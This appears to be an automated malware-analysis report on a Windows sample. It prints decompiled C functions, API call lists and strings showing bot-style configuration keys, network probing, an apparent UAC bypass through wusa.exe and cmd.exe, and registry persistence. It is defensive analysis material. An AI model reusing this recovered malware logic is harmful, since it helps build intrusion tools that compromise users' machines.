htons.WS2_32(00000000), ref: 00402ADB
select.WS2_32 ref: 00402B28
recv.WS2_32(?,00000000,00001000,00000000), ref: 00402B4A
htons.WS2_32(?), ref: 00402B71
htons.WS2_32(?), ref: 00402B8C
GetProcessHeap.KERNEL32(00000000,00000108), ref: 00402BFB

Strings

ps, xrefs: 00402CC7

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Heaphtons$Process$Allocrecvselectsocket
String ID: ps
API String ID: 1639031587-3878219058
Opcode ID: 0a9a318a9520cdba09dec5fbe0b7d43cc2391f431d6a7511ea18a0acbd49a9c0
Instruction ID: 51c4a8f8372388146ce05ee3fd67d3b8acfed2692fca977a8adbfce498b2b585
Opcode Fuzzy Hash: 0a9a318a9520cdba09dec5fbe0b7d43cc2391f431d6a7511ea18a0acbd49a9c0
Instruction Fuzzy Hash: FB61D271508305ABD7209F51DE0CB6FBBE8FB48345F14482AF945A72D1D7F8D8808BAA

Uniqueness

Uniqueness Score: -1.00%

Function 0040199C, Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 106
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0040199C(void* __eax) {
				long _v8;
				_Unknown_base(*)()* _v12;
				struct HINSTANCE__* _v16;
				char _v20;
				void* _v24;
				long _v28;
				_Unknown_base(*)()* _t30;
				intOrPtr _t32;
				void* _t34;
				void* _t41;
				struct HINSTANCE__* _t48;
				_Unknown_base(*)()* _t49;
				void* _t50;

				_v20 = 0;
				_v28 = 0;
				__imp__#11("123.45.67.89");
				_v24 = __eax;
				_t48 = LoadLibraryA("Iphlpapi.dll");
				_v16 = _t48;
				if(_t48 != 0) {
					_v12 = GetProcAddress(_t48, "GetAdaptersInfo");
					_t49 = GetProcAddress(_t48, "GetIfEntry");
					_t30 = GetProcAddress(_v16, "GetBestInterface");
					if(_v12 == 0 || _t49 == 0 || _t30 == 0) {
						FreeLibrary(_v16);
						goto L21;
					} else {
						 *_t30(_v24,  &_v20);
						_t34 = GetProcessHeap();
						_v24 = _t34;
						if(_t34 == 0) {
							L21:
							_t32 = 0;
							L22:
							return _t32;
						}
						_t50 = HeapAlloc(_t34, 0, 0x288);
						if(_t50 == 0) {
							goto L21;
						}
						_push( &_v8);
						_push(_t50);
						_v8 = 0x288;
						if(_v12() == 0x6f) {
							_t50 = HeapReAlloc(_v24, 0, _t50, _v8);
						}
						if(_t50 == 0) {
							L18:
							FreeLibrary(_v16);
							if(_v28 == 0) {
								goto L21;
							}
							_t32 = 1;
							goto L22;
						} else {
							_push( &_v8);
							_push(_t50);
							if(_v12() != 0) {
								goto L18;
							}
							_t41 = _t50;
							while( *((intOrPtr*)(_t41 + 0x19c)) != _v20) {
								_t41 =  *_t41;
								if(_t41 != 0) {
									continue;
								}
								L17:
								HeapFree(_v24, 0, _t50);
								goto L18;
							}
							if( *((intOrPtr*)(_t41 + 0x1a0)) != 6) {
								_v28 = 1;
							}
							goto L17;
						}
					}
				}
				return 0;
			}

APIs

inet_addr.WS2_32(123.45.67.89), ref: 004019B1
LoadLibraryA.KERNEL32(Iphlpapi.dll,?,?,?,?,00000001,00401E9E), ref: 004019BF
GetProcAddress.KERNEL32(00000000,GetAdaptersInfo,?,?,?,?,?,00000001,00401E9E), ref: 004019E2
GetProcAddress.KERNEL32(00000000,GetIfEntry,?,?,?,?,00000001,00401E9E), ref: 004019ED
GetProcAddress.KERNEL32(?,GetBestInterface,?,?,?,?,00000001,00401E9E), ref: 004019F9
GetProcessHeap.KERNEL32(?,?,?,?,00000001,00401E9E), ref: 00401A1D
HeapAlloc.KERNEL32(00000000,00000000,00000288,?,?,?,?,00000001,00401E9E), ref: 00401A36
HeapReAlloc.KERNEL32(?,00000000,00000000,00401E9E,?,?,?,?,00000001,00401E9E), ref: 00401A5A
HeapFree.KERNEL32(?,00000000,00000000,?,?,?,?,00000001,00401E9E), ref: 00401A9B
FreeLibrary.KERNEL32(?,?,?,?,?,00000001,00401E9E), ref: 00401AA4

Strings

GetBestInterface, xrefs: 004019EF
localcfg, xrefs: 004019A3
Iphlpapi.dll, xrefs: 004019B7
GetIfEntry, xrefs: 004019E4
GetAdaptersInfo, xrefs: 004019DC
~s`ysps, xrefs: 004019B1
123.45.67.89, xrefs: 004019A6

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Heap$AddressProc$AllocFreeLibrary$LoadProcessinet_addr
String ID: 123.45.67.89$GetAdaptersInfo$GetBestInterface$GetIfEntry$Iphlpapi.dll$localcfg$~s`ysps
API String ID: 835516345-819159683
Opcode ID: 52436911476c130446cd143f44c65522dc478156bb7ce270366fd521237d2269
Instruction ID: c689a3d9ae3379b0bfe51822f68a21815d588b76a9689f39126eb657c90dfffc
Opcode Fuzzy Hash: 52436911476c130446cd143f44c65522dc478156bb7ce270366fd521237d2269
Instruction Fuzzy Hash: 39313E32A01219AFCF119FE4DD888AFBBB9EB45311B24457BE501B2260D7B94E819F58

Uniqueness

Uniqueness Score: -1.00%

Function 00401280, Relevance: 30.2, APIs: 9, Strings: 8, Instructions: 417stringCOMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(?), ref: 0040139A
lstrlenW.KERNEL32(-00000003), ref: 00401571

Strings

<, xrefs: 00401378
useless, xrefs: 0040161E
@, xrefs: 00401380
uac, xrefs: 00401628
D, xrefs: 004015C6
, xrefs: 00401462
%systemroot%\system32\cmd.exe, xrefs: 00401316
wusa.exe, xrefs: 00401388

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExecuteShelllstrlen
String ID: $%systemroot%\system32\cmd.exe$<$@$D$uac$useless$wusa.exe
API String ID: 1628651668-1839596206
Opcode ID: 2389670ef0d52bc0af3abcc9b5081f8297bcd674c671d6a9091d706800eac20c
Instruction ID: 915494465e6448ea0d8334ed2feda226c725056e28db06d0983f622db304c09c
Opcode Fuzzy Hash: 2389670ef0d52bc0af3abcc9b5081f8297bcd674c671d6a9091d706800eac20c
Instruction Fuzzy Hash: E5F19FB55083419FD720DF64C888BABB7E5FB88304F10892EF596A73A0D778D944CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00401D96, Relevance: 30.0, APIs: 6, Strings: 11, Instructions: 205
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00401D96(void* __ecx, intOrPtr* _a4) {
				struct _OSVERSIONINFOA _v156;
				struct _SYSTEM_INFO _v192;
				char _v196;
				intOrPtr _v200;
				intOrPtr _t59;
				signed int _t61;
				signed int _t63;
				void* _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				signed int _t71;
				intOrPtr _t93;
				intOrPtr _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				intOrPtr* _t103;
				intOrPtr* _t105;
				void* _t109;
				void* _t110;
				void* _t111;
				void* _t112;
				void* _t113;
				void* _t114;

				_t105 = _a4;
				_t102 = 0x64;
				E0040EE2A(__ecx, _t105, 0, _t102);
				_t109 =  &_v200 + 0xc;
				 *_t105 = _t102;
				_v156.dwOSVersionInfoSize = 0x9c;
				if(GetVersionExA( &_v156) == 0) {
					 *((char*)(_t105 + 0x41)) = 0;
				} else {
					 *((char*)(_t105 + 0x41)) = (_v156.dwMajorVersion << 4) + _v156.dwMinorVersion;
				}
				GetSystemInfo( &_v192);
				 *((char*)(_t105 + 0x3f)) = _v192.dwNumberOfProcessors;
				_v196 = 0;
				_t103 = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
				if(_t103 != 0) {
					 *_t103(GetCurrentProcess(),  &_v196);
				}
				_t104 = "localcfg";
				 *((char*)(_t105 + 0x40)) = 2;
				_t59 = E0040E819(1, "localcfg", "lid_file_upd", 0);
				_t92 = "flags_upd";
				 *((intOrPtr*)(_t105 + 0x24)) = _t59;
				 *(_t105 + 4) =  *(_t105 + 4) | E0040E819(1, "localcfg", "flags_upd", 0);
				_t61 =  *(_t105 + 4);
				_t110 = _t109 + 0x20;
				if((_t61 & 0x00000008) != 0) {
					 *(_t105 + 4) = _t61 & 0xfffffff7;
					E0040DF70(1, "work_srv");
					E0040DF70(1, "start_srv");
					_t110 = _t110 + 0x10;
				}
				E0040EA84(1, _t104, _t92, 0);
				_t93 = 0;
				_t63 = E0040E819(1, _t104, "net_type", 0);
				_t111 = _t110 + 0x20;
				 *(_t105 + 0x14) = _t63;
				if(E0040199C(_t63) == 0) {
					 *(_t105 + 0x14) =  *(_t105 + 0x14) | 0x00000010;
				} else {
					 *(_t105 + 0x14) =  *(_t105 + 0x14) | 0x00000020;
				}
				_t65 = E0040E819(1, _t104, "born_date", _t93);
				_t112 = _t111 + 0x10;
				 *((intOrPtr*)(_t105 + 0x30)) = _t93;
				if(_t65 == _t93) {
					_t97 = E0040F04E(_t93);
					E0040EA84(1, _t104, "born_date", _t97);
					_t112 = _t112 + 0x14;
					 *((intOrPtr*)(_t105 + 0x30)) = _t97;
					_t93 = 0;
				}
				_t94 = "id";
				_t66 = E0040E819(1, _t104, "id", _t93);
				_t113 = _t112 + 0x10;
				 *((intOrPtr*)(_t105 + 0xc)) = _t66;
				if(_t66 == 0) {
					_v200 = E00401B71();
					E0040EA84(1, _t104, _t94, _t77);
					_t113 = _t113 + 0x10;
					 *((intOrPtr*)(_t105 + 0xc)) = _v200;
				}
				_t95 = "hi_id";
				_t67 = E0040E819(1, _t104, "hi_id", 0);
				_t114 = _t113 + 0x10;
				 *((intOrPtr*)(_t105 + 0x10)) = _t67;
				if(_t67 == 0) {
					_v200 = E00401BDF();
					E0040EA84(1, _t104, _t95, _t74);
					_t114 = _t114 + 0x10;
					 *((intOrPtr*)(_t105 + 0x10)) = _v200;
				}
				 *((intOrPtr*)(_t105 + 8)) = 0x5e;
				_t96 = E0040E819(1, _t104, "loader_id", 0);
				if(_t96 == 0) {
					_t96 = 6;
					E0040EA84(1, _t104, "loader_id", _t96);
				}
				 *((intOrPtr*)(_t105 + 0x1c)) = _t96;
				 *((intOrPtr*)(_t105 + 0x34)) = E004030B5();
				if( *0x41201d == 0) {
					if( *0x41201f == 0) {
						 *(_t105 + 0x18) =  *(_t105 + 0x18) & 0x00000000;
					} else {
						if(E00406EC3() != 0) {
							 *(_t105 + 0x18) = 2;
						} else {
							 *(_t105 + 0x18) = 0x10;
						}
					}
				} else {
					 *(_t105 + 0x18) = 1;
				}
				if(_v196 != 0) {
					 *(_t105 + 0x18) =  *(_t105 + 0x18) | 0x00000200;
				}
				_t71 = GetTickCount() / 0x3e8;
				 *0x412110 = _t71;
				 *(_t105 + 0x28) = _t71;
				return _t71;
			}

APIs

GetVersionExA.KERNEL32 ref: 00401DC6
GetSystemInfo.KERNEL32(?), ref: 00401DE8
GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 00401E03
GetProcAddress.KERNEL32(00000000), ref: 00401E0A
GetCurrentProcess.KERNEL32(?), ref: 00401E1B
GetTickCount.KERNEL32 ref: 00401FC9

Part of subcall function 00401BDF: GetComputerNameA.KERNEL32 ref: 00401C15

Strings

hi_id, xrefs: 00401F16, 00401F1B, 00401F33
flags_upd, xrefs: 00401E3E, 00401E43, 00401E7C
born_date, xrefs: 00401EAD, 00401ECC
localcfg, xrefs: 00401E2A, 00401E31, 00401E44, 00401E7D, 00401E8C, 00401EB2, 00401ED1, 00401EE7, 00401EFF, 00401F1C, 00401F34, 00401F50, 00401F70
net_type, xrefs: 00401E87
work_srv, xrefs: 00401E5E
kernel32, xrefs: 00401DF7
IsWow64Process, xrefs: 00401DF2
loader_id, xrefs: 00401F4B, 00401F6B
start_srv, xrefs: 00401E6C
lid_file_upd, xrefs: 00401E25

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressComputerCountCurrentHandleInfoModuleNameProcProcessSystemTickVersion
String ID: IsWow64Process$born_date$flags_upd$hi_id$kernel32$lid_file_upd$loader_id$localcfg$net_type$start_srv$work_srv
API String ID: 4207808166-1381319158
Opcode ID: d0281ec4e27c19a57065509444ecf1f2da3960809a548710cb8338c5931bd5af
Instruction ID: b3eca0d4ea79c587a2fa4a56f90b70e38022670634c063da468af4dc7e8924f5
Opcode Fuzzy Hash: d0281ec4e27c19a57065509444ecf1f2da3960809a548710cb8338c5931bd5af
Instruction Fuzzy Hash: 2451EA705043446FD330AF768C85F67BAECEB84708F00493FF955A2292D7BDA95487A9

Uniqueness

Uniqueness Score: -1.00%

Function 02168578, Relevance: 28.4, APIs: 14, Strings: 2, Instructions: 361registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,00000000,00000103,?), ref: 02168643
RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00000000,00000103,?), ref: 02168664
RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004,?,?,00000000,00000103,?), ref: 02168691
RegCloseKey.ADVAPI32(?,?,?,00000000,00000103,?), ref: 0216869A

Strings

C:\Windows\SysWOW64\mmeemcze\kwrovuui.exe, xrefs: 02168818, 02168825, 02168835
", xrefs: 02168955

Memory Dump Source

Source File: 0000000E.00000002.665832793.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false

Yara matches

Similarity

API ID: Value$CloseOpenQuery
String ID: "$C:\Windows\SysWOW64\mmeemcze\kwrovuui.exe
API String ID: 237177642-634864817
Opcode ID: 1c60b81768065cc7cafd43d65e6870f876b06d8eccb24c6c2cb771a703b3980a
Instruction ID: 3faf894c254e35a7dc4ad9d77ca5c4da357d8e090d19a0db6c4e59f0e7b258a4
Opcode Fuzzy Hash: 1c60b81768065cc7cafd43d65e6870f876b06d8eccb24c6c2cb771a703b3980a
Instruction Fuzzy Hash: 5DC180B1980249BEEB11EBA4DD88FFE7B7DEB05304F154075F605E2050EBB04AA89B65

Uniqueness

Uniqueness Score: -1.00%

Function 02162CB2, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 194memorynetworkCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000), ref: 02162CD6
socket.WS2_32(00000002,00000002,00000011), ref: 02162CF0
htons.WS2_32(00000000), ref: 02162D2B
select.WS2_32 ref: 02162D78
recv.WS2_32(?,00000000,00001000,00000000), ref: 02162D9A
GetProcessHeap.KERNEL32(00000000,00000108), ref: 02162E4B

Strings

ps, xrefs: 02162F17

Memory Dump Source

Source File: 0000000E.00000002.665832793.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateProcesshtonsrecvselectsocket
String ID: ps
API String ID: 127016686-3878219058
Opcode ID: 34b12e3987a7911b0151bc10fc282e4d0fd91c502d2533c711cf9584e7c9b6b6
Instruction ID: 06d3957e7242ab7719fd9d2a29251589fb43eee214590fd0c7edf50682f73c72
Opcode Fuzzy Hash: 34b12e3987a7911b0151bc10fc282e4d0fd91c502d2533c711cf9584e7c9b6b6
Instruction Fuzzy Hash: 7C61DE71944305AFC3209FA4DC0CBBFBBE8EB88355F114829FD9497150D7B5D8A08BA6

Uniqueness

Uniqueness Score: -1.00%

Function 021614D0, Relevance: 23.2, APIs: 9, Strings: 4, Instructions: 417stringCOMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(?), ref: 021615EA
lstrlenW.KERNEL32(-00000003), ref: 021617C1

Strings

, xrefs: 021616B2
@, xrefs: 021615D0
D, xrefs: 02161816
<, xrefs: 021615C8

Memory Dump Source

Source File: 0000000E.00000002.665832793.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false

Yara matches

Similarity

API ID: ExecuteShelllstrlen
String ID: $<$@$D
API String ID: 1628651668-1974347203
Opcode ID: 03adf1138caabce6029c68f91071d7d17f6d9527f2eb0b017a6edce7519f1441
Instruction ID: 5412b50e06112b77881213176b7ded027c408c5ae5cff15649cc59de5a34b0de
Opcode Fuzzy Hash: 03adf1138caabce6029c68f91071d7d17f6d9527f2eb0b017a6edce7519f1441
Instruction Fuzzy Hash: 0DF1ADB1548341AFD320CF64C888BAEB7F5FB88304F00892DF59A97390D7B49944CB56

Uniqueness

Uniqueness Score: -1.00%

Function 00402DF2, Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 97
memorylibrarynetworkCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E00402DF2(intOrPtr _a4) {
				void* _v8;
				signed int _v12;
				long _v16;
				intOrPtr _v28;
				short _v30;
				char _v32;
				struct HINSTANCE__* _t18;
				void* _t22;
				signed int _t23;
				short _t27;
				signed int _t31;
				intOrPtr* _t35;
				intOrPtr* _t37;
				CHAR* _t38;
				void* _t40;

				_t38 = "iphlpapi.dll";
				_t18 = GetModuleHandleA(_t38);
				if(_t18 == 0 || _t18 == 0xffffffff) {
					_t18 = LoadLibraryA(_t38);
				}
				if(_t18 == 0 || _t18 == 0xffffffff) {
					L18:
					return 0;
				} else {
					_t35 = GetProcAddress(_t18, "GetNetworkParams");
					if(_t35 == 0) {
						goto L18;
					}
					_t22 = HeapAlloc(GetProcessHeap(), 0, 0x4000);
					_t33 =  &_v16;
					_v8 = _t22;
					_v16 = 0x4000;
					_t23 =  *_t35(_t22,  &_v16);
					if(_t23 != 0) {
						goto L18;
					}
					_v12 = _v12 & _t23;
					_t37 = _v8 + 0x10c;
					if(_t37 == 0) {
						L17:
						HeapFree(GetProcessHeap(), 0, _v8);
						return _v12;
					} else {
						goto L8;
					}
					do {
						L8:
						_t40 = _t37 + 4;
						if(_t40 == 0) {
							goto L16;
						}
						_t27 = 2;
						_v32 = _t27;
						__imp__#9(0x35);
						_v30 = _t27;
						__imp__#11(_t40);
						_v28 = _t27;
						if(_t27 == 0 || _t27 == 0xffffffff) {
							__imp__#52(_t40);
							if(_t27 == 0) {
								goto L16;
							}
							_t27 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t27 + 0xc))))));
							_v28 = _t27;
							goto L13;
						} else {
							L13:
							if(_t27 != 0 && _t27 != 0xffffffff) {
								_t31 = E00402CEB(_t33,  &_v32, _a4);
								_pop(_t33);
								_v12 = _t31;
								if(_t31 != 0) {
									goto L17;
								}
							}
						}
						L16:
						_t37 =  *_t37;
					} while (_t37 != 0);
					goto L17;
				}
			}

APIs

GetModuleHandleA.KERNEL32(iphlpapi.dll,73BCEA30,?,000DBBA0,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E01
LoadLibraryA.KERNEL32(iphlpapi.dll,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E11
GetProcAddress.KERNEL32(00000000,GetNetworkParams,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E2E
GetProcessHeap.KERNEL32(00000000,00004000,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E4C
HeapAlloc.KERNEL32(00000000,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E4F
htons.WS2_32(00000035), ref: 00402E88
inet_addr.WS2_32(?), ref: 00402E93
gethostbyname.WS2_32(?), ref: 00402EA6
GetProcessHeap.KERNEL32(00000000,?,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402EE3
HeapFree.KERNEL32(00000000,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402EE6

Strings

iphlpapi.dll, xrefs: 00402DFB, 00402E00, 00402E10
GetNetworkParams, xrefs: 00402E28
~s`ysps, xrefs: 00402E93

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Heap$Process$AddressAllocFreeHandleLibraryLoadModuleProcgethostbynamehtonsinet_addr
String ID: GetNetworkParams$iphlpapi.dll$~s`ysps
API String ID: 929413710-64764534
Opcode ID: ac765a0f8383a0e22933114e4494c8504a9546d168c54e12ec6921eb1cd39c15
Instruction ID: af9ac6d56ee620c8fffc4a8d4b95bbdbc136fdcf8554a1f3230d1ae4f4a52a91
Opcode Fuzzy Hash: ac765a0f8383a0e22933114e4494c8504a9546d168c54e12ec6921eb1cd39c15
Instruction Fuzzy Hash: E3318131A40209ABDB119BB8DD4CAAF7778AF04361F144136F914F72D0DBB8D9819B9C

Uniqueness

Uniqueness Score: -1.00%

Function 0216764F, Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 345registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,00000000,00020119,?), ref: 021676C2
RegOpenKeyExA.ADVAPI32(?,?,00000000,00000101,?), ref: 02167740
RegQueryValueExA.ADVAPI32(?,00000000,?,00000000,?,?,00000104), ref: 02167778
___ascii_stricmp.LIBCMT ref: 0216789D
RegCloseKey.ADVAPI32(?), ref: 02167937
RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 02167956
RegCloseKey.ADVAPI32(?), ref: 02167967
RegCloseKey.ADVAPI32(?), ref: 02167995
RegCloseKey.ADVAPI32(?), ref: 02167A3F

Part of subcall function 0216F3F5: lstrlen.KERNEL32(000000E4,00000000,004122F8,000000E4,02167713,?), ref: 0216F3FD

GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 021679DF
RegCloseKey.ADVAPI32(?), ref: 02167A36

Strings

", xrefs: 021677E9

Memory Dump Source

Source File: 0000000E.00000002.665832793.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false

Yara matches

Similarity

API ID: Close$Open$AttributesEnumFileQueryValue___ascii_stricmplstrlen
String ID: "
API String ID: 3433985886-123907689
Opcode ID: 6662dee372d798d6f1e3baf347185b0c176791543b489e25c2cc06528122fd8e
Instruction ID: 8f79e469c9fc1d73d337a320538c97dad8713e130057ea08e4059e3f85579505
Opcode Fuzzy Hash: 6662dee372d798d6f1e3baf347185b0c176791543b489e25c2cc06528122fd8e
Instruction Fuzzy Hash: E4C1A371980209AFEB119FA4DC4CFFEBBB9EF49314F1440A5E504E6190EB75DAA1CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0040704C, Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 332
registryCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E0040704C(intOrPtr _a4, signed int* _a8, int _a12, int _a16, int* _a20) {
				CHAR* _v8;
				void* _v12;
				signed int _v16;
				int _v20;
				char _v24;
				char _v28;
				signed int _v32;
				char _v64;
				char _v363;
				char _v364;
				void _v400;
				intOrPtr* _t88;
				int* _t89;
				int* _t90;
				int* _t91;
				char* _t93;
				signed int _t96;
				signed int _t97;
				long _t99;
				signed int _t107;
				int _t109;
				int _t119;
				int _t121;
				int _t122;
				int _t123;
				signed int _t125;
				signed int* _t130;
				int _t136;
				int _t149;
				int _t155;
				void* _t158;
				signed int _t166;
				int _t196;
				signed int _t204;
				int _t206;
				void* _t207;
				void* _t208;
				void* _t210;
				void* _t211;

				_t88 = _a8;
				_t167 = 0;
				_v16 = 0x12c;
				_v24 = 0x20;
				_v364 = 0;
				if(_t88 != 0) {
					 *_t88 = 0;
				}
				_t89 = _a12;
				if(_t89 != _t167) {
					 *_t89 = _t167;
				}
				_t90 = _a16;
				if(_t90 != _t167) {
					 *_t90 = _t167;
				}
				_t91 = _a20;
				if(_t91 != _t167) {
					 *_t91 = _t167;
				}
				_t93 = E00402544(0x4122f8,  &E004106AC, 0x2e, 0xe4, 0xc8);
				_t208 = _t207 + 0x14;
				if(RegOpenKeyExA(0x80000001, _t93, _t167, 0x101,  &_v12) != 0) {
					L21:
					_t96 = E0040EE2A(_t167, 0x4122f8, 0, 0x100) | 0xffffffff;
					goto L22;
				} else {
					_t97 = E00406DC2(_t167);
					_push( &_v16);
					_push( &_v364);
					_push( &_v28);
					_v32 = _t97;
					_push(0);
					_push( &_v24);
					_t167 =  &_v64;
					_push( &_v64);
					_v8 = 0;
					_push(0);
					while(1) {
						_t99 = RegEnumValueA(_v12, ??, ??, ??, ??, ??, ??, ??);
						if(_t99 == 0x103) {
							break;
						}
						__eflags = _t99;
						if(_t99 != 0) {
							L18:
							_t25 =  &_v8;
							 *_t25 =  &(_v8[1]);
							__eflags =  *_t25;
							_push( &_v16);
							_push( &_v364);
							_push( &_v28);
							_push(0);
							_push( &_v24);
							_push( &_v64);
							_push(_v8);
							_v16 = 0x12c;
							_v24 = 0x20;
							continue;
						}
						__eflags = _v24 - _t99;
						if(_v24 <= _t99) {
							goto L18;
						}
						__eflags = _v16 - _t99;
						if(_v16 <= _t99) {
							goto L18;
						}
						__eflags = _v28 - 1;
						if(_v28 != 1) {
							goto L18;
						}
						_t107 = E0040EED1( &_v64, E00402544(0x4122f8,  &E004106A0, 9, 0xe4, 0xc8));
						_t210 = _t208 + 0x1c;
						asm("sbb eax, eax");
						_t109 =  ~_t107 + 1;
						__eflags = _t109;
						_v20 = _t109;
						if(_t109 != 0) {
							L23:
							_v8 = E0040EE95( &_v364, E00402544(0x4122f8,  &E0041069C, 4, 0xe4, 0xc8));
							E0040EE2A(_t167, 0x4122f8, 0, 0x100);
							_t211 = _t210 + 0x28;
							__eflags = _v8;
							if(_v8 == 0) {
								__eflags = _v364 - 0x22;
								if(_v364 == 0x22) {
									E0040EF00( &_v364,  &_v363);
									_t149 = E0040ED23( &_v364, 0x22);
									_t211 = _t211 + 0x10;
									__eflags = _t149;
									if(_t149 != 0) {
										 *_t149 = 0;
									}
								}
								_t196 = E0040EE95( &_v364, E00402544(0x4122f8, 0x410694, 5, 0xe4, 0xc8));
								E0040EE2A(_t167, 0x4122f8, 0, 0x100);
								__eflags = _t196;
								if(_t196 != 0) {
									_t119 = E0040ED77( &_v364, _a4);
									__eflags = _t119;
									if(_t119 != 0) {
										 *_t196 = 0;
										_t121 = E0040ED23( &_v364, 0x5c);
										_v8 = _t121;
										__eflags = _t121;
										if(_t121 != 0) {
											_t63 =  &_v8;
											 *_t63 =  &(_v8[1]);
											__eflags =  *_t63;
										} else {
											_v8 =  &_v364;
										}
										_t122 = E00406CAD(_v8);
										__eflags = _t122;
										if(_t122 != 0) {
											_pop(_t204);
											_push(0x8b00007e);
											asm("lock xor esi, 0x55555555");
											_v16 = _t204;
											_t166 = _t204 >> 0x00000008 & 0x000000ff;
											_t123 = E00406C96(_t204);
											__eflags = _t123;
											if(_t123 != 0) {
												L57:
												RegCloseKey(_v12);
												__eflags = _a16;
												if(_a16 != 0) {
													E0040EF00(_a16,  &_v64);
												}
												_t125 = 0;
												__eflags = _v20;
												 *_t196 = 0x2e;
												goto L34;
											}
											__eflags = _t166 - 0x40 - 0x3f;
											if(_t166 - 0x40 > 0x3f) {
												goto L57;
											}
											__eflags = (_t204 & 0x000000ff) - 0x10;
											if((_t204 & 0x000000ff) >= 0x10) {
												goto L57;
											}
											_t206 = _a12;
											 *_t196 = 0x2e;
											__eflags = _t206;
											if(_t206 != 0) {
												_t136 = GetFileAttributesExA( &_v364, 0,  &_v400);
												__eflags = _t136;
												if(_t136 != 0) {
													 *_t206 = 1;
												}
											}
											_t130 = _a8;
											__eflags = _t130;
											if(_t130 != 0) {
												 *_t130 = _t166;
											}
											__eflags = _a16;
											if(_a16 != 0) {
												E0040EF00(_a16,  &_v64);
											}
											__eflags = _a20;
											if(_a20 != 0) {
												E0040EF00(_a20, _v8);
											}
											_t125 = 0;
											__eflags = _v20;
											goto L34;
										} else {
											RegCloseKey(_v12);
											__eflags = _a16;
											if(_a16 != 0) {
												E0040EF00(_a16,  &_v64);
											}
											 *_t196 = 0x2e;
											goto L33;
										}
									}
									RegCloseKey(_v12);
									_t96 = 0;
									goto L22;
								} else {
									RegCloseKey(_v12);
									__eflags = _a16;
									if(_a16 != 0) {
										E0040EF00(_a16,  &_v64);
									}
									L33:
									_t125 = 0;
									__eflags = _v20;
									L34:
									_t96 = (_t125 & 0xffffff00 | __eflags == 0x00000000) + 1;
									L22:
									return _t96;
								}
							}
							RegCloseKey(_v12);
							__eflags = _a16;
							if(_a16 != 0) {
								E0040EF00(_a16,  &_v64);
							}
							_t96 = 1;
							goto L22;
						}
						_t155 = E00406CAD( &_v64);
						_pop(_t167);
						__eflags = _t155;
						if(_t155 == 0) {
							L17:
							E0040EE2A(_t167, 0x4122f8, 0, 0x100);
							_t208 = _t210 + 0xc;
							goto L18;
						}
						_t158 = E0040F1A5( &_v64);
						_t167 = _v32 ^ 0x5e5e5e5e;
						__eflags = _t158 - (_v32 ^ 0x5e5e5e5e);
						if(_t158 == (_v32 ^ 0x5e5e5e5e)) {
							goto L23;
						}
						goto L17;
					}
					RegCloseKey(_v12);
					goto L21;
				}
			}

0x00407055
0x00407058
0x0040705a
0x00407061
0x00407068
0x00407071
0x00407073
0x00407073
0x00407075
0x0040707a
0x0040707c
0x0040707c
0x0040707e
0x00407083
0x00407085
0x00407085
0x00407087
0x0040708c
0x0040708e
0x0040708e
0x004070b4
0x004070b9
0x004070ca
0x004071b8
0x004071c8
0x00000000
0x004070d0
0x004070d0
0x004070d8
0x004070df
0x004070e3
0x004070e4
0x004070e9
0x004070ed
0x004070ee
0x004070f1
0x004070f2
0x004070f5
0x0040719b
0x0040719e
0x004071a9
0x00000000
0x00000000
0x004070fb
0x004070fd
0x0040716e
0x0040716e
0x0040716e
0x0040716e
0x00407174
0x0040717b
0x0040717f
0x00407180
0x00407185
0x00407189
0x0040718a
0x0040718d
0x00407194
0x00000000
0x00407194
0x004070ff
0x00407102
0x00000000
0x00000000
0x00407104
0x00407107
0x00000000
0x00000000
0x00407109
0x0040710d
0x00000000
0x00000000
0x00407123
0x00407128
0x0040712d
0x0040712f
0x0040712f
0x00407130
0x00407133
0x004071d0
0x004071f4
